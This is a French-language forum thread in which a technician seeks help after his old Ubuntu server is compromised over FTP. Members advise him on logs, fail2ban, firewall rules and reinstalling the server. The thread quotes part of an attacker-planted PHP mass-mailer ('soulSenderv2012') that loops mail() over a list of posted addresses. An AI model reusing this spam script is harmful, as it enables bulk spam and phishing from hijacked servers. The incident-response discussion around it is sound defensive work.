OVH Community, votre nouvel espace communautaire.

URGENT probleme serveur


bbr18
04/08/2016, 14h46
tiens tu trouveras comment faire ici : https://www.how-to.ovh/viewtopic.php?f=10&t=20

arn0
04/08/2016, 14h39
@sich : oui je suis bien d'accord avec toi. Je vais essayé de faire des tests avec le KS de test que j'ai pris afin de migrer rapidement.

Sinon j'ai fait appel à un sous-traitant pour le Firewall (il a tout bloqué sauf les ports utilisables) et changé le port SSH.

Il a également installé l'utilitaire megacli pour surveiller le RAID. Il m'a dit qu'il faut que j'ajoute la commande megacli -LDInfo -LAll -aAll dans le système de monitoring du serveur. J'utilise Munin et le RTM de OVH. Je ne vois pas ou ajouter cette commande ?

sich
04/08/2016, 08h44
Vouloir à tout prix conserver d'anciennes versions c'est aller au devant de problèmes....
Il va bien falloir à un moment donné faire la montée de version.... Je ne connais pas radius, mais il doit bien être possible au pire d'écrire un script de migration pour transférer les données d'un format à l'autre...
Ces montées de versions c'est pénible quand on a un programme qui marche bien et on a du problème à comprendre le pourquoi du comment...
Mais dans l'industrie du logiciel une entreprise ne peux pas se permettre de maintenir x version de son programme.

Au pire sur un lan isolé on peux parfois se permettre quelques prises de risques, mais sur un serveur en ligne ça ne pardonne pas trop...

buddy
03/08/2016, 14h50
Les anciennes ont été abandonnées pour quoi ?
Il y a peut être une bonne raison comme la sécurité ? (hypothèse je n'en sais rien )

arn0
03/08/2016, 14h31
Citation Envoyé par bbr18
dire qu'il n'y a pas de faille parce qu'il n'y a pas de CMS mais "juste" du code perso c'est vivre dangereusement car une faille aussi un potentiel mauvais codage de ton truc perso...
Tu devrais te prendre un ks ou vps et faire des tests, tu installes un OS récent puis tes progs, Radius dernière version, et là tu verras si ça fonctionne et par la suite il faudra impérativement mettre à jour ( un apt-get une fois par semaine est simple à faire et préserve de biens des ennuis, pas tous mais pas mal)
je n'ai pas dit qu'il n'y avait pas de faille Je sais qu'il peut y avoir des failles du faite de l’ancienneté de l'OS... je disais juste que comme il n'y a pas de CMS les failles sont plus difficile à exploitées.

Pour le KS j'en ai pris un de test il me faut maintenant du temps pour tester et adapter tout cela

- - - Mise à jour - - -

Citation Envoyé par fritz2cat
Et qu'est-ce qui justifie de garder un vieux Radius qu'une version à jour ne ferait pas aussi bien ?
Les nouvelles versions Radius n'utilisent plus du tout le même mécanisme/codage que les anciennes versions. Donc si je pouvais remettre la même conf radius sur la même version avec un OS à jour cela irait beaucoup plus vite

bbr18
03/08/2016, 13h20
dire qu'il n'y a pas de faille parce qu'il n'y a pas de CMS mais "juste" du code perso c'est vivre dangereusement car une faille aussi un potentiel mauvais codage de ton truc perso...
Tu devrais te prendre un ks ou vps et faire des tests, tu installes un OS récent puis tes progs, Radius dernière version, et là tu verras si ça fonctionne et par la suite il faudra impérativement mettre à jour ( un apt-get une fois par semaine est simple à faire et préserve de biens des ennuis, pas tous mais pas mal)

fritz2cat
03/08/2016, 13h02
Et qu'est-ce qui justifie de garder un vieux Radius qu'une version à jour ne ferait pas aussi bien ?

buddy
03/08/2016, 11h54
Si tu la recompiles surement oui.

Mais çà m'étonnerai que tu aies un package tout fait. après tu peux aussi tenter de prendre un vieux package et de forcer saon installation ..

arn0
03/08/2016, 11h51
je sais que cela craint pour la version de l'OS! Et comme dit precedement je ne m'occupe pas de cette partie la normalement et c'est également prévu de reprendre une nouvelle machine avec OS à jour.

Concernant le Hack, il n'y a pas eu de faille d'exploité sur le serveur. (il y a des script maison et pas de CMS donc sa doit aider poru ne pas exploité des failles) Il a "simplement" trouvé le mdp d'un users. Tous les MDPS ont été changés et je suis entrain de voir pour le Firewall et Fail2ban (merci buddy) en attendant.

Après peut-on installer une vielle version du Radius (qui n'est plus maintenue) sur un OS à jour ?

buddy
03/08/2016, 10h57
Si jamais tu veux installer fail2ban, il faut d'abord ajouter les dépots pour les anciennes distributions avec cette commande :

sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list

source : http://askubuntu.com/questions/91815...ported-release

puis faire apt-get update && apt-get install fail2ban (çà te donnera la liste des paquets à installer et tu pourras accepter ou refuser)

Nowwhat
03/08/2016, 10h47
Citation Envoyé par sich
houlà, de l'ubuntu 8.04.......... Et ça vient poster sur le forum pour des soucis de hack ? Sérieusement ?
Yep, car:
mais je n'ose pas l'installer sur le serveur de prod de "peur" qu'il mette a jour des packets et que plus rien ne fonctionne
pour autant, ça fait des années que je "upgrade" mon Debian (Ubuntu est très proche de Debian) et je n'ai JAMAIS eu le moindre soucis.
Garder un vieille version en ligne, c'est un peu comme supplier sur le net entier (dont une partie qui va répondre à la demande par carrément hacker et dire : "Merci de nous rendre la tâche si facile !!") de se faire b********.

Si on connais rien : au moins, on garde à jour son serveur. Point final.
Sinon, on arrête les frais - ou plutôt, on passe à la caisse (je pense que c'est fait, cette partie la) soit on sous-traite sur le champs.

La question importante qui reste à vérifier : Les sauvegardes sont ok et dans une état exploitable ?

sich
03/08/2016, 10h10
houlà, de l'ubuntu 8.04.......... Et ça vient poster sur le forum pour des soucis de hack ? Sérieusement ?

janus57
02/08/2016, 22h42
Citation Envoyé par buddy
D'ailleurs, c'est quoi la distributions et les versions des "logiciels" dessus ?

Car il y a eu de nombreuses failles récemment.
https://www.shellshock.fr/ il y a 2 ans.
Le serveur a été mis à jour depuis ?

Il y a également régulièrement des mises à jour de sécurité pour php / apache aussi.
Bonjour,

d'après ce message : https://forum.ovh.com/showthread.php...l=1#post675258
C'est un ubuntu 8.04 (je sais que sa craint mais c'est prévu comme dit plus haut)
clairement ce serveur représente une menace sachant qu'au minimum il n'a plus reçus de mise à jour officiel d'ubuntu depuis le 9mai 2013 (Cf : https://wiki.ubuntu.com/Releases et je pense pas que quelqu'un à patch les grosses faille à la main).

Note : si votre logiciel interne et si vitale que ça, pourquoi il n'a pas été mise à jour au fur et à mesure pour supporter les dernière grosses version des dépendances ?
Car j'ai vu parler de radius dans le topic et si j'en crois les dépots ubuntu, sur cette version vous avez du radius en version 1.x.
Et si je regarde ici http://freeradius.org/download.html (logiciel freeradius qui permet de monter un radius) on peu lire ceci :
As of January 2008, the version 1.1.x releases are no longer actively maintained.
+ CVE FreeRadius (vu que vous ne savez pas quel logiciel précis est sur le serveur j'ai pris celui qui revient en premier)

Donc clairement il faudrait que vous revoyez votre logiciel au plus vite.

Cordialement, janus57

buddy
02/08/2016, 12h24
D'ailleurs, c'est quoi la distributions et les versions des "logiciels" dessus ?

Car il y a eu de nombreuses failles récemment.
https://www.shellshock.fr/ il y a 2 ans.
Le serveur a été mis à jour depuis ?

Il y a également régulièrement des mises à jour de sécurité pour php / apache aussi.

bbr18
02/08/2016, 12h16
Concernant Fail2ban je sais l'installer et le configurer mais je n'ose pas l'installer sur le serveur de prod de "peur" qu'il mette a jour des packets et que plus rien ne fonctionne
installer un serveur et ne plus jamais le mettre à jour (c'est ce que sous-entend cette phrase) te mènera à bien plus d'ennuis et de temps perdu que de devoir updater tes vieux scripts/programmes

arn0
02/08/2016, 11h42
Citation Envoyé par buddy
Pour le coup pui, pas grand chose ne semble avoir été fait..

as-tu mis fail2ban ? as-tu augmenté le bantime ? car 300 sec c'est beaucoup trop peu.

pour ton prochain serveur, il y a de bonnes documentations faites par BBR18 (et quelques unes de moi) ici ; https://www.how-to.ovh/
çà te permettra de configurer le serveur et le sécuriser un minimum.

Pour ton serveur actuel, importe sur ton PC "perso" les sauvegardes.
Je me suis pris un petit serveur de test Kimsufi et je "m'entraine" dessus notamment en suivant effectivement le bon site de bbr18.

Concernant Fail2ban je sais l'installer et le configurer mais je n'ose pas l'installer sur le serveur de prod de "peur" qu'il mette a jour des packets et que plus rien ne fonctionne

sich
02/08/2016, 11h26
Sans vouloir défendre le presta vu que je ne sais pas ce qu'il a fait.
Mais un serveur ça se suit dans le temps, idéalement via un contrat d'infogérance. Poser une fois un serveur avec une config de base et ne plus y toucher ensuite conduira forcément à des problèmes plus tard dans le temps....

buddy
02/08/2016, 11h10
Pour le coup pui, pas grand chose ne semble avoir été fait..

as-tu mis fail2ban ? as-tu augmenté le bantime ? car 300 sec c'est beaucoup trop peu.

pour ton prochain serveur, il y a de bonnes documentations faites par BBR18 (et quelques unes de moi) ici ; https://www.how-to.ovh/
çà te permettra de configurer le serveur et le sécuriser un minimum.

Pour ton serveur actuel, importe sur ton PC "perso" les sauvegardes.

arn0
02/08/2016, 11h02
Citation Envoyé par buddy
Heu, rassure moi, ce n'est pas toi l'admin du serveur ? parce que sinon, soit il faut vraiment s'y mettre ou confier ceci à quelqu'un d'autres ...
Non ce n'est pas moi. Je suis technicien d'intervention réseau. Je connais quelques bases d'administration serveur mais bon... A ce que je vois c'est que ce serveur n'a pas été bien configuré et que le presta qui la configuré n'a pas fait les choses correctement donc je tente d’appliquer quelques correctifs sans faire de boulette.

buddy
02/08/2016, 10h48
Citation Envoyé par arn0
Est-ce parecque OVH bloque actuellement le port 25 a cause des SPAMS et donc plus accés au Firewall ou il n'est pas actif sur le serveur ??
Heu, rassure moi, ce n'est pas toi l'admin du serveur ? parce que sinon, soit il faut vraiment s'y mettre ou confier ceci à quelqu'un d'autres ...

bbr18
02/08/2016, 10h47
rien à voir avec ovh, c'est sur ton serveur que ça se passe, vas donc faire un tour sur mon site de tutos, tu auras pas mal de pistes ( https://www.how-to.ovh/viewtopic.php?f=2&t=15 ) à adapter selon tes besoins

arn0
02/08/2016, 10h29
Citation Envoyé par bbr18
si tu ne te connectes qu'en sftp donc sur port 22 je suppose, tu peux bloquer le port 21, tu ajoutes cette ligne dans ton firewall
Code:
nano /etc/iptables.up.rules
Code:
-A INPUT -p tcp -m tcp --dport 21 -j DROP
et tu le relances
tu peux aussi faire tout ça dans virtualmin (webmin, réseau, Linux firewall)
je viens de voir que je n'ai pas de fichier iptables.up.rules dans /etc :s !
J'ai également regardé dans Webmin et cela me dit :
Aucun firewall IPtables n'a été configuré sur votre système pour le moment. Webmin peut le configurer pour vous afin d'être sauvegardé dans le fichier /etc/iptables.up.rules, avec les paramètres par défaut basés sur l'un des choix ci-dessous..


Est-ce parecque OVH bloque actuellement le port 25 a cause des SPAMS et donc plus accés au Firewall ou il n'est pas actif sur le serveur ??

arn0
01/08/2016, 17h43
Citation Envoyé par bbr18
essaie aussi de voir comment il est entré dans les log de proftpd
/var/log/proftpd/proftpd.log
ça te donnera quelques pistes
Dans proftpd.log je n'ai rien a part des logs de décembre2012 :
Code:
Dec 08 11:50:18 ns proftpd[20374] ns: ProFTPD 1.3.1 (stable) (built Thu Feb 21 04:21:14 UTC 2008) standalone mode STARTUP
Dec 08 11:50:19 ns proftpd[20374] ns: ProFTPD killed (signal 15)
Dec 08 11:50:19 ns proftpd[20374] ns: ProFTPD 1.3.1 standalone mode SHUTDOWN
Le seul truc interessant c'est dansles LOGS de pure-ftpd :

Transfer.log =

Code:
97e78ebd.skybroadband.com -site1 [16/Jul/2016:00:17:25 +0100] "PUT /home/site1/public_html/trimite.php" 200 4854
97e78ebd.skybroadband.com - site1 [16/Jul/2016:02:34:01 +0100] "PUT /home/site1/public_html/ap.php" 200 7086

bbr18
01/08/2016, 17h39
essaie aussi de voir comment il est entré dans les log de proftpd
/var/log/proftpd/proftpd.log
ça te donnera quelques pistes

bbr18
01/08/2016, 17h34
si tu ne te connectes qu'en sftp donc sur port 22 je suppose, tu peux bloquer le port 21, tu ajoutes cette ligne dans ton firewall
Code:
nano /etc/iptables.up.rules
Code:
-A INPUT -p tcp -m tcp --dport 21 -j DROP
et tu le relances
tu peux aussi faire tout ça dans virtualmin (webmin, réseau, Linux firewall)

arn0
01/08/2016, 17h26
Citation Envoyé par bbr18
oui
relis ce que j'ai mis un peu au dessus pour limiter l'utilisateur dans son home
Ok j'avais pas vu ton EDIT merci

Donc pour résumé je change les mdp de tous les users "site1"/ "site2" et le mdp root. car logiquement il a trouvé le mdp de l'user "site1" car il se connecte en pure-ftpd. Donc il n'y a pas de faille il a juste trouvé le mdp c'est sa ?

Et log cela devrait "corriger" le soucis (le temps de changer de serveur) vu que apparement il ne passe pas par une faille php. Et je met un Fail2ban.

D'ailleurs il y a une difference entre ftp et pure-ftpd. Et sur Filzella je me connecte en SFTP donc le ftp ne me sert pas ?

bbr18
01/08/2016, 17h19
oui
relis ce que j'ai mis un peu au dessus pour limiter l'utilisateur dans son home

arn0
01/08/2016, 17h14
Citation Envoyé par bbr18
faudrait quand même chercher un peu, hein ?
alors : onglet Webmin, Système, Changez le Mot de Passe, et là tu choisis l'utilisateur à modifier
Oups quel c*n je suis allé trop vite et je suis allé directement dans "Utilisateur et groupe" pff merci

Et le fait de changer ce mot de passe, cela sert uniquement pour l'accès en FTP/SSH de ce login ?

bbr18
01/08/2016, 17h08
faudrait quand même chercher un peu, hein ?
alors : onglet Webmin, Système, Changez le Mot de Passe, et là tu choisis l'utilisateur à modifier

arn0
01/08/2016, 17h00
Citation Envoyé par bbr18
par défaut virtualmin crée l'user selon le nom du domaine, exemple :

donc si tu as site1 c'est toi qui a défini ce nom pour ce virtualhost
Oui sauf que ce n'est pas moi qui est installé cela à l'époque. Donc il y a t il un moyen pour changer le mot de passe de "site1" ?
On voit cela ou dans la config ? Car a priori le hacker a créé unqiuement des fichier dans le repertoire site1 avec comme login "site1"

bbr18
01/08/2016, 16h57
par défaut virtualmin crée l'user selon le nom du domaine, exemple :
Nom de domaine mondomainetest.ovh
Nom d'administrateur Unix mondomainetest
Groupe Unix mondomainetest
Créé le 01/Aou/2016 16:55 par root
Répertoire utilisateur /home/mondomainetest
donc si tu as site1 c'est toi qui a défini ce nom pour ce virtualhost
et chaque user ne voit que son répertoire, SI et uniquement si, tu as bien modifié cela dans la config
Dans virtualmin c'est dans Limites et Validation, FTP Directory Restrictions et là : all virtuals serveurs et cocher Virtual server's home directory

arn0
01/08/2016, 16h46
Apparement il a utiliser le login "site1" pour pouvoir mettre les fichiers. Donc le login "site1" voit uniquement les repertoire du "site1" apparement..?

Je n'utilise pas le login "site1" pour me connecter. c'est un login qui a été créé par Virtualmin. D'ailleurs j'ai beau chercher dans Virtualmin, je ne voit pas de fonction pour changer le "login site 1"?

Et quelle est la difference entre pure-ftpd et ftp ? Car il est passé par pure-ftpd poru mettre les fichiers

Concernant l'auth j'ai uniquement sa (pas eu de tentatvive avant) :

Jul 15 07:57:55 ns623534 pure-ftpd: pam_unix(pure-ftpd:session): session opened for user site1 by (uid=0)
Jul 15 07:57:55 ns623534 pure-ftpd: pam_unix(pure-ftpd:session): session closed for user site1

Nowwhat
01/08/2016, 16h42
Citation Envoyé par bbr18
il a dit plusieurs fois qu'il n'avait pas de cms sur son serveur mais du code maison,
Ok, donc ce n'est peut être pas le fils du voisin, l'auteur des scripts de son site - mais ces propres lignes scripts PHP (Java, html, n'importe).
Soit.

Pour autant, d'autres accès sont possibles :
Un user FTP avec un mot de passe trop simple (alors, pour trouver le upload de ces fichiers, ils suffit de consulter ce log FTP)
Un accès SSH (il utilise toujours le user+mot de passe)
Autre ?!


Edit : il s'avère être un accès par le FTP.
Solution simple et moderne : dé-installe le FTP car ce protocole doit être montré dans un musé, pas sur un serveur.
C'est du vécu depuis des années.
On a le SFTP maintenant (qui n'a pas besoin besoin d'un serveur logiciel FTP).

bbr18
01/08/2016, 16h36
si tu as une ip fixe, tu n'autorises que ton ip sur le port 21, sinon fail2ban ou mieux tu utilises sftp avec une clé ssh
déjà change les mots de passe et mets-en des costaux

buddy
01/08/2016, 16h35
mais encore une fois, il a pu modifier d'autres fichiers (systèmes ou php) ou installer des backdoor ... Donc bloquer le FTP ne réglera pas tous les soucis ..

sich
01/08/2016, 16h31
à priori c'est un problème sur le ftp oui.
Pour info ne jamais laisser ftp ou ssh sur leur port par défaut.... Et il faut des mots de passe complexes, sans oublier fail2ban pour bannir après 3 essais...
Le petit malotru qui est entré sur ton serveur a probablement trouvé le mot de passe par brute force. Ou alors un virus sur un poste qui se connecte à ce serveur...
Il faudrait remonter plus haut dans les logs si il y'a de nombreux essais avant de réussir la connexion ou si c'est du premier coup.

Sinon pour bloquer le ftp il faut supprimer le package, ou fermer le port 21 via le parefeu.

arn0
01/08/2016, 16h18
J'ai trouvé un truc intéressant au jour où sa a commencer à merder !

Dans pure-ftpd j'ai sa :

Transfer.log

97e78ebd.skybroadband.com - repertoire [16/Jul/2016:00:17:25 +0100] "PUT /home/repertoire/public_html/trimite.php" 200 4854
97e78ebd.skybroadband.com - repertoire [16/Jul/2016:02:34:01 +0100] "PUT /home/repertoire/public_html/ap.php" 200 7086
Donc si j'ai bien compris il est passé par "pure-ftpd" c'est sa ? Pas par une faille d'une page php donc ? Peut-on bloquer le pure-ftpd ?

buddy
01/08/2016, 15h49
pour le radius, il faudrait voir quelle version est celle utilisée et la dernière sortie. Il y a rarement de grande différence.

Sinon pour le prochain serveur, le mieux est de partir sur de la virtualisation avec un containeur pour chaque utilisateur ...

Il faudrait déjà voir de quand date le fichier, puis vérifier les logs SSH et FTP aussi. (à la date ) si les logs n'existent plus ... c'est cuit.
Mais si ils sont passé en SSH ou FTP, il a pu modifier des centaines de fichiers, se crée des portes d'entrée ailleurs ...

PHP est bien à jour ? idem pour apache ?
c'est quelle version qui tourne ?

sich
01/08/2016, 15h46
tout serveur vérolé comme le vôtre doit être réinstallé... C'est la base.... Vu qu'il est quasiment impossible de savoir par où l'intrus est passé...
Il faut vérifier vos logs de connexion SSH/FTP pour voir si c'est par là qu'il est passé. Ou alors vérifier le code source de vos sites pour trouver une faille...
Ce qui peux aider (parfois) c'est la date de modif / création de ces fichiers externes, et tenter de trouver une correspondance dans les logs (un POST quelque part ?).
On a trop peu d'infos pour vous aider avec ce dont on dispose, et il est souvent difficile de toute façon de s'assurer que tout est clean sans réinstaller.

arn0
01/08/2016, 15h37
Concernant le changement de serveur je sais mais je ne suis pas tout seul hélas. Et ce n'est pas q'un simple collé du site il y a aussi un programme nommé le radius dans une certaine version si le serveur est changé du coup il y a une nouvelle version de ce radius (je sais pas si c'est possible de mettre une version ancienne d'un programme sur un OS à jour ?) et donc il faut tout réadapter.

Et si je remet le site (où il y a les 2 scripts) sa va recommencé non ? Il faut déjà que je trouve comment il a fait et pour le moment je ne vois pas comment (les scripts ne sont pas deposé en mode root mais par le user virtualmin qui n'a pas de droits)

buddy
01/08/2016, 15h22
Bonjour,

soit il a "volé" votre code d'accès SSH / FTP
Soit il est passé par une faille de votre site.

Pour moi, ton serveur est compromis, il a peut être les accès admin du serveur.
Donc que tu aies éteint postfix oui c'est efficace, mais il peut peut être le rallumer ...
Comme il peut supprimer aussi tout le contenu de ton serveur ...

Si demain le serveur est "nocif" pour le réseau, OVH le coupera simplement ... Si demain ton serveur est coupé par OVH tu fais quoi ? tu pleures ?
Donc oui çà prend du temps comme tu dis de changer de serveur, mais çà fait déjà 2 semaines ...

fritz2cat
01/08/2016, 15h21
Tu refais un nouveau serveur, tu mets le code d'origine de ton site web, sans les peaux de bananes que les autres ont glissé dedans, tu conserves les logs pour voir par quel trou les pirates rentrent.
Autant dire que les sites troués comme le tien doivent être retirés du réseau sans délai car c'est la gangrène du web.
Les pirates utilisent les serveurs troués tel que le tien comme relais pour lancer des opérations criminelles vers d'autres sites,
Lorsque tu effaces tes logs ou ta queue postfix, c'est une bénédiction pour eux - plus de trace.

bbr18
01/08/2016, 15h10
il a dit plusieurs fois qu'il n'avait pas de cms sur son serveur mais du code maison, donc chercher les failles dans ce code car si c'est bien ça la porte d'entrée, même en réinstallant la faille sera encore là, il faut d'abord localiser le problème et le résoudre.

arn0
01/08/2016, 15h09
D'accord oui c'est prévu que je change de serveur. mais sa peut prendre quelques temps... Je me demande comment il a fait car je n'utilise pas de CMS. Y a t il un moyen de voir comment il a réussi ? Si c'est dans un repertoire d'un site, il est forcement passer un une page php de ce site et pas ailleurs non ?

Si j'ai coupé Postfix, les scripts ne fonctionne plus de toute manière non ? Je peux comme même les supprimer ?
Installer Fail2ban pourra m'aider un peu le temps de changer de serveur ? Y a t il quelques chose a faire pour securisé un peu en attendant (desactiver fonction mail? Changer les mots de passe ? Couper le port 25 ?)

Nowwhat
01/08/2016, 15h01
Citation Envoyé par arn0
Pouvez-vous m'expliquer SVP le fonctionnement de ces codes .....
Non, c'est trop longue. Il faut que tu sache lire ce langage le plus simple au monde, le Basic ... ah non, le PHP !
Par contre, il est clair que ce n'est pas toi qui a copié ces fichiers sur ton serveur.
Ces fichiers ont été copié avec l'aide d'autre fichiers - et cette fois si des fichiers choisi par toi.

Exemple, qui couvre 95 % des cas : t'as du installer un plugin/extension/mod à la ouf d'un CMS, et ce plugin/extension/mod a été codé par un vrai expert, genre le fiston-gamin de mon voisin. Le vrai expert, quoi. Il écrit de vrai beautés pour des CMS comme WordPress et Joomla. Malheureusement, des types comme arn0 l'utisent en plus, et c'est là ou tout part en co*ille.
Le résultat : t'es plain dedans.

Donc : t'as trouve comment les mails sont injectés dans le queue de ton serveur.

Simplement supprimer ces fichiers "ap.php" et "trimite.php" ne va pas vraiement t'aider car le type qui exploite ces fichiers, et ainsi ton serveur mail va ....
Citation Envoyé par arn0
et comment ils ont pu se retrouver dans un repertoire du serveur ? (faut-il changer les codes acces ?)
simplement le re-uploader.
Avec l'astuce que j'ai déjà expliqué plus haut.

Pour arrêter tout ce affaire très simple, arrête ton serveur web. Du coup tu risque plus rien.

buddy
01/08/2016, 14h49
Des scripts qui envoient du spam ...

Pour le reste, il suffit de lire le code. Il n'est pas très compliqué.

Pour le serveur, il est compromis (rien ne dit qu'il n'y a que ces 2 fichiers et pas d'autres ailleurs, plus profond dans le système ou qu'il ne s'est pas ouvert des portes d'entrée ailleurs), il faut le réinstaller et repartir sur des bases (sauvegardes) saines.

Si ton serveur est vieux, prends en un autre, transfère le tout et rend l'ancien.

arn0
01/08/2016, 14h16
Bon j'ai enfin trouvé d'ou les mails sont envoyés !

J'ai 2 scripts PHP qui se sont "glissés" dans un repertoire d'un site.

Les script sont nommés ap.php et trimite.php

Voici le code :

Code:
\r\n";
	$i = 0;
	$count = 1;
		
		while($email[$i]) {
		

		$ok = "ok";
		$num1 = rand(100000,999999);
		$num2 = rand(100000,999999);
		$aux = explode(';',$email[$i]);
		
                 
		$message = $_POST['html'];
		$message = stripslashes($message);
		
                $message = str_replace("%rand%", $num1, $message);
		$message = str_replace("%rand2%", $num2, $message);
		
                $message = str_replace("%email%", $aux[0], $message); 
		$message = str_replace("%nome%", $aux[1], $message);
		$message = str_replace("%cpf%", $aux[2], $message);

		$subject = str_replace("%nome%", $aux[1], $subject);
     		$subject = str_replace("%rand%", $num1,  $subject);
     		$subject = str_replace("%rand2%", $num2,  $subject);
	

	 	if(mail($aux[0], $subject, $message, $headers))
		echo "* Número: $count ".$aux[0]." enviado! By FloRida

"; else echo "* Número: $count ".$aux[0]." Erro no servidor!

"; $i++; $count++; } $count--; } ?> .: soulSenderv2012 :.
em MASSA, da MASSA, uhu
De / e-mail :
Assunto:
Código HTML:

*Lembrete: texto em HTML
E-mails abaixo:

Ps.: 1 e-mail por linha.


*Separado por quebra de linha
 
Code:
\r\n";
	$i = 0;
	$count = 1;
		
		while($email[$i]) {
		

		$ok = "ok";
		$num1 = rand(100000,999999);
		$num2 = rand(100000,999999);
		$aux = explode(';',$email[$i]);
		
                 
		$message = $_POST['html'];
		$message = stripslashes($message);
		
                $message = str_replace("%rand%", $num1, $message);
		$message = str_replace("%rand2%", $num2, $message);
		
                $message = str_replace("%email%", $aux[0], $message); 
		$message = str_replace("%nome%", $aux[1], $message);
		$message = str_replace("%cpf%", $aux[2], $message);

		$subject = str_replace("%nome%", $aux[1], $subject);
     		$subject = str_replace("%rand%", $num1,  $subject);
     		$subject = str_replace("%rand2%", $num2,  $subject);
	

	 	if(mail($aux[0], $subject, $message, $headers))
		echo "* Número: $count ".$aux[0]." enviado! By FloRida

"; else echo "* Número: $count ".$aux[0]." Erro no servidor!

"; $i++; $count++; } $count--; } ?> .: soulSenderv2012 :.
em MASSA, da MASSA, uhu
De / e-mail :
Assunto:
Código HTML:

*Lembrete: texto em HTML
E-mails abaixo:

Ps.: 1 e-mail por linha.


*Separado por quebra de linha
 
Pouvez-vous m'expliquer SVP le fonctionnement de ces codes et comment ils ont pu se retrouver dans un repertoire du serveur ? (faut-il changer les codes acces ?)

fritz2cat
01/08/2016, 13h01
A mon avis si tu as 4 lignes, provenant d'adresse IP à 3 octets, avec des dates du 17 juillet au 30 juillet, je crois que ce log est inexploitable.
Je pense qu'on va avoir du mal à s'en sortir avec aussi peu d'information. (et qui ne montre rien d'utile)
Si tu ne comprends rien, adjoins-toi les services d'un pro.

C'est tout ce que je peux te conseiller.

arn0
01/08/2016, 11h52
Bonjour

je suis entrain de chercher mais j'ai tellement de ligne.. Je ne vois pas grand chose a part des lignes que je comprend pas :

193.248.190. - - [17/Jul/2016:09:20:47 +0200] "GET / HTTP/1.0" 200 150 "-" "*BAhBAAQAcpLY4jW6tDbkH1GOYonCfkAur-7I7VqhNLkPoGD0mNXCAkWACAAAA"

80.13.222. - - [17/Jul/2016:20:07:07 +0200] "GET /crossdomain.xml HTTP/1.1" 404 186 "http://www.jeux-fille-gratuit.com/jeu-4399.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"

80.14.195. - - [31/Jul/2016:01:45:17 +0200] "GET /js/scriptaculous.js?load=effects HTTP/1.1" 200 2654 "http://

80.11.160. - - [31/Jul/2016:01:45:22 +0200] "GET / HTTP/1.1" 200 1103 "-" "Sonos"
je continue mes recherches mais dans les access log il y a rien de particulier

sich
31/07/2016, 14h02
les mails passent par "pickup" ? à voir dans les logs postfix ça (quand les envois commencent).
Si c'est le cas il est possible de désactiver ça dans postfix dans /etc/postfix/master.
Voir aussi interdire la fonction mail() dans php.
Mais l'idéal étant de trouver le script coupable pour éviter le problème à la source.

En cas de CMS l'idéal étant de déployer un nouveau serveur, puis de réinstaller de 0 le cms avec les versions à jour, y comprit les plugins. De là il faut remplacer la bdd et remettre les fichiers perso (dans upload généralement).
Il est possible aussi de bloquer l'execution de php dans le dossier upload...

Mais encore une fois, pour faire quelque chose de fiable il faut trouver d'où vient le problème, et pour ça il faut connaitre le script php qui envoie les mails. Au pire il faut réactiver postfix le temps que quelques mails soient envoyés puis le recouper aussitôt.

bbr18
31/07/2016, 12h21
avec virtualmin il n'aura rien dans /var/log/apache2/access.log
car les log d'accès sont dans /var/log/virtualmin/nomdomaine.tld_access_log

fritz2cat
31/07/2016, 11h45
mailq -> ça donne une réponse vide ?

Dans le mail.log tu peux voir à quelle heure les mails ont été générés.
Dans le Apache access.log tu peux voir à quelle heure quel script a été appelé.

Quand tu compares les deux il y a une petite chance de trouver le script fautif.
Il faut espérer que tu n'aies pas un site à grosse fréquentation.
Ca diminue la taille de la botte de foin dans laquelle tu dois chercher l'aguille !

arn0
31/07/2016, 11h40
Ah zut et pas moyen de récupérer quelques entêtes smtp dans des fichiers du serveur meme si la queue est vide ? Je ne compte pas redémarrer le serveur mail PostFix n'ayant pas d'utilité sur ce serveur.

Dans les logs apache si cest une faille sur un script je suis censé voir quel genre de ligne apparaître ?

fritz2cat
31/07/2016, 10h36
Le nom du script se trouvait probablement dans les mails que tu as effacés (dans les en-têtes SMTP)
Pour les log apache, sois curieux, télécharge les deux (access et error)
Compare les heures des envois SMTP et l'heure d'accès aux scripts.
Vérifie aussi si les heures dans le log sont GMT ou heure de Paris.

Si les téléchargements sont trop longs, si les fichiers sont trop gros pour être ouvers avec Wordpad, si les fins de lignes foirent avec Notepad (bloc-notes) de Windows, il est grand temps d'apprendre la commande 'less'.

arn0
31/07/2016, 10h02
Oui j'ai un virtualmin. Faut que je regarde dans "access log" ou "error log" ?

Concernant les entetes, j'ai vider la queue donc pas fait attention. (de mêmoire il y en avait de "www-data" je suis entrain de telecherger mail.log

EDIT j'ai des logs de ce genre dans "mail.log" : mais je vois pas quel script a pu etre utilisé..?

Code:
Jul 31 08:52:28 ns postfix/error[12202]: C8AA88743B: to=, relay=none, delay=1316640, delays=1316561/79/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to alt4.gmail-smtp-in.l.google.com[173.194.72.26]:25: Connection timed out)
Jul 31 08:52:28  postfix/error[12254]: C4B453A9C7: to=, relay=none, delay=1316737, delays=1316658/79/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to alt4.gmail-smtp-in.l.google.com[173.194.72.26]:25: Connection timed out)
Jul 31 08:52:28 ns postfix/qmgr[5406]: C53552A864: from=<>, size=6937, nrcpt=1 (queue active)
Jul 31 08:52:28 n postfix/qmgr[5406]: C8AA88743B: from=, status=expired, returned to sender
Jul 31 08:52:28 ns postfix/qmgr[5406]: C4B453A9C7: from=, status=expired, returned to sender
Jul 31 08:52:28 ns postfix/error[12238]: C112F2B0E2: to=, relay=none, delay=1316858, delays=1316778/79/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to alt4.gmail-smtp-in.l.google.com[173.194.72.26]:25: Connection timed out)
Jul 31 08:52:28 ns postfix/error[12171]: C4E128D5F4: to=, relay=none, delay=1316682, delays=1316603/79/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to alt4.gmail-smtp-in.l.google.com[173.194.72.26]:25: Connection timed out)
Jul 31 08:52:28 ns postfix/cleanup[11079]: 4E72F2B300: message-id=<20160731065228.4E72F2B300@ns.ovh.net>
Jul 31 08:52:28 ns postfix/bounce[9750]: C4B453A9C7: sender non-delivery notification: 4E72F2B300
Jul 31 08:52:28 ns postfix/local[12241]: 5565D851AC: to=, relay=local, delay=29, delays=0.93/28/0/0.01, dsn=2.0.0, status=sent (delivered to command: procmail -a "$EXTENSION")
